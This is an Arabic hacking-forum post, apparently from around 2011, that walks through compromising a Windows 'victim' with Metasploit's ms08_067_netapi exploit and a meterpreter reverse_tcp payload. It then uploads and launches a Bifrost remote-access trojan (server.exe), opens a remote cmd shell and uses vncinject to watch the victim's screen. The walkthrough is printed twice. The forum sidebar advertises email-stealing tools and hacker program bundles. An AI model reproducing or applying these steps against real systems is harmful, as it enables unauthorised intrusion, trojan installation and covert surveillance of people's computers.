طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ونختار windows/smb/ms08_067_netapi
show payloads
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ونختار windows/ meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
[AD]= 750) this.width = 750; return false;" />
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
والصور تعبر عن نفسها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
شاشة الضحية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
إنتهى
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ونختار windows/smb/ms08_067_netapi
show payloads
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ونختار windows/ meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
[AD]= 750) this.width = 750; return false;" />
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
والصور تعبر عن نفسها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
شاشة الضحية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
إنتهى
الإثنين يوليو 25, 2011 4:58 pm من طرف صداء الاشواق
» شريط اهداءات
الخميس يونيو 16, 2011 10:45 pm من طرف مابي اخاف
» مرحبااااااااااااااااااا
الخميس يونيو 16, 2011 10:22 pm من طرف مابي اخاف
» بلييييييييييييييييييز يجب النتباه
الخميس يونيو 16, 2011 9:56 pm من طرف مابي اخاف
» هل الطيبة عيب أم ميزة ؟؟؟
الخميس يونيو 16, 2011 9:53 pm من طرف مابي اخاف
» امسيه شعريه
الخميس يونيو 16, 2011 9:32 pm من طرف مابي اخاف
» تحــــدى اكــبر هاكر يخترقكـ مع Dr.YoUseF
الأحد أبريل 03, 2011 6:58 pm من طرف عيسى باش
» اقوى برنامج لا سرقة الايميلت جديد 2008
الإثنين مارس 07, 2011 4:43 pm من طرف WSXSX
» اكبر مكتبة برامج هاكر هديه للمنتدى-ايش ما يخطر عبالك موجود
الأحد مارس 06, 2011 9:40 pm من طرف WSXSX